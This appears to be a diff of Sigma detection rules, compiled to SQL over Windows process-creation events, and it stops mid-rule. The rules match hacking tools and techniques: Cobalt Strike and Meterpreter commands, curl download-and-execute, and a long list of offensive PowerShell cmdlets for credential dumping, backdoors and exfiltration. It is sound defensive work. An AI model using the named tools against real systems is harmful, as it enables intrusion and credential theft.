"attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE 